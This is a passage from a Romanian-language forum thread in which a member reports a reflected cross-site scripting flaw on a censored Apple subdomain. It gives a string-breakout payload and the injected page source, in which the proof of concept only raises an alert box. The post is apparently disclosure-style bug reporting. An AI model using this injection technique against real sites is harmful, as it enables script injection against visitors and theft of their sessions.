Jump to content
dancezar

[Alt XSS]*apple.com

Recommended Posts

  • Active Members

Mersi mult.Am cenzurat poza ,oricum nu se vedea mare lucru.

Se pare ca nu este singurul loc vurnerabil pe acelasi subdomeniu.Am dat ok la alertbox mi-a afisat pagina apoi am dat serch la ceva fara script in input si mi-a afisat acel alertbox.

Link to comment
Share on other sites

  • Active Members

Nu stiu de ce pe firefox nu merge.

Nu este nevoie de vre-un vector bypass pe chrome in acest caz,pentru ca parametrul vurnerabil preluat din get si este injectat direct intr-un tag <script> unde verifica daca browserul de pe care accez pagina este iPhone/iPod*OS.*AppleWebKit*Mobile*Safari.Este ceva de genul

site.com/pagina.html?parametru=ceva';else{alert(1);}if(1==2){// ,iar chrome nu sesizeaza xss-u doar ie il vede.

Iar dupa ce il accesez in pagina sursa apare ceva de genul

<script>

var addSBTag = /(iPhone|iPod).*OS.*AppleWebKit.*Mobile.*Safari/.test(navigator.userAgent);

if (addSBTag) {

var headNode = document.getElementsByTagName("head")[0];

var sbNode = document.createElement('meta');

sbNode.name = 'cenzurat';

sbNode.content = 'cenzurat?parametru=38';}else{alert('danyweb09');}if(1=2){//';

headNode.appendChild(sbNode);

}

</script>

Edit:Daca vreun admin vrea sa ma verifice trimit linkul prin pm

Edited by danyweb09
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...